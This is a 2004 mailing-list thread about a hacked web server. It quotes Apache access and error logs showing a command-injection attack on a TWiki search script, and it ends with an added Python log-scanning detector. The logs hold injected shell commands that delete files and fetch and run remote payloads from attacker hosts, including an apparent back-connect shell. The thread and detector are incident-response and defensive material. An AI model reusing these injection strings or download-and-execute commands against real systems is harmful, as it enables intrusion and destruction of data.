My website was hacked! (fwd)
David Kramer
david at thekramers.net
Wed Nov 24 23:48:13 EST 2004
On Wed, 24 Nov 2004, Steve Seremeth wrote:
> David Kramer wrote:
>
> >Anything else I should try?
> >
> >Should I panic more than I am? Right now I feel strongly this was a
> >benign "stupid Apache tricks" thing, and I need to find the hole and close
> >it, but no need to nuke the server and start over.
> >
> >
> >
> To add to my off-list comments...
>
> I'm a little hazy on the details as this was a while ago, but here's
> what we found after the hacker had exploited a _known_ gaping hole in a
> php app one of our users was running:
> * They had dropped a false shell into /var/tmp that ran under the apache
> user -- I think it listened on some funny port - and we discovered it
> when we went to bounce apache and got some weird message
> * They tried to compile an irc bot (go figure)
> * Apache logs had the evidence:
> Several instances of this:
> ./log/access_log:203.130.222.150 - - [12/Jan/2004:19:29:10 -0800] "GET
> /pm_inc.php?pm_path=http://www.delhill.net/_borders/&cahyo=cd%20/var/tmp%20;%20wget%20exploiter.info/tools/mx
> HTTP/1.1" 200 188 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;
> DigExt)"
>
> Nasty.
>
> I ran chkrootkit and it didn't find anything. I also did checksums
> against a lot of local binaries compared to known good ones to make sure
> they were the originals.
>
> I bet you are right that it's an apache-only thing, but I would be
> _really_ sure. I would also leave apache (and perhaps other daemons as
> well) down until you are sure you found the problem. Our offender came
> back once or twice more unsuccessfully.
I think I found it. I'm running TWiki, and at that time there were some
really nasty things happening in access_log and error_log.
Access_log:
200.175.37.89 - - [23/Nov/2004:22:59:19 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3B+id%3Bpwd%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 5067
66.196.91.123 - - [23/Nov/2004:22:59:55 -0500] "GET /docs/php/functions.html HTTP/1.0" 304 -
200.175.37.89 - - [23/Nov/2004:22:59:57 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bls%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 20131
200.175.37.89 - - [23/Nov/2004:23:00:31 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+htdocs%3Bls%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 58706
65.54.188.63 - - [23/Nov/2004:23:00:44 -0500] "GET /phpdemo/manual/function.asort.html HTTP/1.0" 200 3905
200.175.37.89 - - [23/Nov/2004:23:00:56 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+htdocs%3Brm+-rf+*index*%3Bls+*index*%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3058
200.175.37.89 - - [23/Nov/2004:23:01:48 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget+www.gigachat.net%2Fxpl%2Fcgi%3Bchmod+777+cgi%3B.%2Fcgi%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3059
66.196.90.228 - - [23/Nov/2004:23:02:13 -0500] "GET /robots.txt HTTP/1.0" 404 282
65.54.188.63 - - [23/Nov/2004:23:02:29 -0500] "GET /phpdemo/manual/function.xmldoc.html HTTP/1.0" 200 2314
66.196.90.245 - - [23/Nov/2004:23:02:59 -0500] "GET /twiki/bin/view/TWiki/TWikiMetaData HTTP/1.0" 200 18571
65.54.188.63 - - [23/Nov/2004:23:04:05 -0500] "GET /phpdemo/manual/function.rewinddir.html HTTP/1.0" 200 2208
200.212.114.3 - - [23/Nov/2004:23:04:40 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget+bandits.webm.ru%2Fxpl%2Fdc.pl%3Bperl+dc.pl%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3051
200.212.114.3 - - [23/Nov/2004:23:05:02 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bpwd%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3013
200.212.114.3 - - [23/Nov/2004:23:05:47 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bpwd%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3570
65.54.188.63 - - [23/Nov/2004:23:05:55 -0500] "GET /phpdemo/manual/function.mssql-close.html HTTP/1.0" 200 3033
66.196.91.132 - - [23/Nov/2004:23:05:57 -0500] "GET /phpdemo/manual/function.cpdf-show-xy.html HTTP/1.0" 304 -
200.212.114.3 - - [23/Nov/2004:23:06:17 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget+bandits.webm.ru%2Fxpl%2Fcgi%3Bchmod+777+cgi%3B.%2Fcgi%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3750
200.212.114.3 - - [23/Nov/2004:23:07:21 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget+bandits.webm.ru%2Fxpl%2Fdc.pl%3Bperl+dc.pl%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 4868
66.196.90.105 - - [23/Nov/2004:23:07:28 -0500] "GET /docs/php/function.mcve-ub.html HTTP/1.0" 304 -
65.54.188.63 - - [23/Nov/2004:23:07:29 -0500] "GET /phpdemo/manual/function.sem-acquire.html HTTP/1.0" 200 2871
66.26.157.9 - - [23/Nov/2004:23:07:33 -0500] "GET /phpdemo/phpvscgi.html HTTP/1.1" 200 4109
200.212.114.3 - - [23/Nov/2004:23:07:47 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget+bandits.webm.ru%2Fxpl%2Fdc.pl%3Bperl+dc.pl+200.193.15.61+4%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 7178
200.212.114.3 - - [23/Nov/2004:23:08:11 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28pwd%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3593
65.
error_log:
[Tue Nov 23 20:18:13 2004] statistics: Use of uninitialized value in concatenation (.) or string at ../lib/TWiki.pm line 528.
...
[Tue Nov 23 22:08:46 2004] [error] PHP Warning: main(/top.inc) [<a href='http://thekramers.net/docs/php/function.main.html'>function.main.html</a>]: failed to open stream: No such file or directory in /srv/www/htdocs/tmp/20010708/index.phtml on line 5
[Tue Nov 23 22:08:46 2004] [error] PHP Fatal error: main() [<a href='http://thekramers.net/docs/php/function.require.html'>function.require.html</a>]: Failed opening required '/top.inc' (include_path='.:/usr/share/php') in /srv/www/htdocs/tmp/20010708/index.phtml on line 5
[Tue Nov 23 22:34:11 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
...
[Tue Nov 23 23:02:13 2004] [error] [client 66.196.90.228] File does not exist: /srv/www/twiki/robots.txt
[Tue Nov 23 23:02:58 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
[Tue Nov 23 23:04:39 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
sh: -c: line 2: syntax error: unexpected end of file
[Tue Nov 23 23:05:02 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
sh: -c: line 2: syntax error: unexpected end of file
[Tue Nov 23 23:05:46 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
[Tue Nov 23 23:06:14 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
--23:06:15-- http://bandits.webm.ru/xpl/cgi
=> `cgi'
Resolving bandits.webm.ru... done.
Connecting to bandits.webm.ru[82.151.99.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,032 [text/plain]
0K .......... ...... 100% 37.46 KB/s
23:06:16 (37.46 KB/s) - `cgi' saved [17032/17032]
[Tue Nov 23 23:07:20 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
--23:07:20-- http://bandits.webm.ru/xpl/dc.pl
=> `dc.pl'
Resolving bandits.webm.ru... done.
Connecting to bandits.webm.ru[82.151.99.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 729 [text/plain]
0K 100% 711.91 KB/s
23:07:21 (711.91 KB/s) - `dc.pl' saved [729/729]
[Tue Nov 23 23:07:45 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
--23:07:46-- http://bandits.webm.ru/xpl/dc.pl
=> `dc.pl.1'
Resolving bandits.webm.ru... done.
Connecting to bandits.webm.ru[82.151.99.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 729 [text/plain]
0K 100% 711.91 KB/s
23:07:46 (711.91 KB/s) - `dc.pl.1' saved [729/729]
I will also note that the "bandits.webm.ru" website contains one phrase,
in Russian: "Soon it will begin..."
I'm going to disable TWiki for now.
---------------------------------------------------------------------------
David Kramer                     Partner, Agile Rules
http://www.agilerules.com
162 Marett Road, Lexington, MA 02421     davidk at agilerules.com
Specializing in coaching and development in Agile/XP practices
and embedded software development
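A detection pass over access_log lines like the ones in this thread, added here as an example and not part of the original posts: it parses Common Log Format, percent-decodes every query parameter, and flags values that carry shell metacharacters (the TWiki search injection above) or a bare remote URL (the PHP include abuse Steve describes). The sample lines, the attacker.example host and the two TEST-NET addresses are constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample lines modelled on the thread's access_log excerpts: the TWiki
# search injection, a PHP include given a remote URL (placeholder host), a benign search.
SAMPLE_LOG = r'''
200.175.37.89 - - [23/Nov/2004:22:59:19 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3B+id%3Bpwd%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 5067
203.0.113.7 - - [12/Jan/2004:19:29:10 -0800] "GET /pm_inc.php?pm_path=http://attacker.example/_borders/&cahyo=cd%20/var/tmp HTTP/1.1" 200 188
66.196.91.123 - - [23/Nov/2004:22:59:55 -0500] "GET /docs/php/functions.html HTTP/1.0" 304 -
198.51.100.9 - - [23/Nov/2004:23:10:00 -0500] "GET /twiki/bin/search/Know/?scope=text&search=meeting+notes HTTP/1.1" 200 4000
'''

# Common Log Format: the request target carries no raw spaces, so \S+ is safe.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$')
# Decoded parameter values a search box or include path should never carry.
SHELL_META = re.compile(r"[;|`]|\$\(|&&")
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def decode_params(target):
    """Split the query string on '&' and percent-decode every key/value pair."""
    pairs = []
    for chunk in urlsplit(target).query.split('&'):
        key, _, value = chunk.partition('=')
        if key:
            pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs

def classify(value):
    """Return why a decoded value looks hostile, or None if it looks benign."""
    if SHELL_META.search(value):
        return 'shell metacharacters in parameter'
    if REMOTE_URL.match(value):
        return 'remote URL passed as parameter'
    return None

def find_suspicious(log_text):
    """Scan access_log text; return one record per suspicious parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        for key, value in decode_params(m['target']):
            reason = classify(value)
            if reason:
                hits.append({'ip': m['ip'], 'ts': m['ts'], 'param': key, 'value': value, 'reason': reason})
    return hits

for hit in find_suspicious(SAMPLE_LOG):   # analyst-readable decoded view
    print(f"{hit['ts']} {hit['ip']} {hit['param']}={hit['value']!r} [{hit['reason']}]")
```

Decoding the `search` value turns the `%27%3B+%28...` noise into the plain `'; (uname -a; id;pwd) | sed ...` that the CGI handed to `sh -c`, which is also why the `sh: -c: line 2: syntax error` lines in error_log line up with the entries whose injected command was cut short.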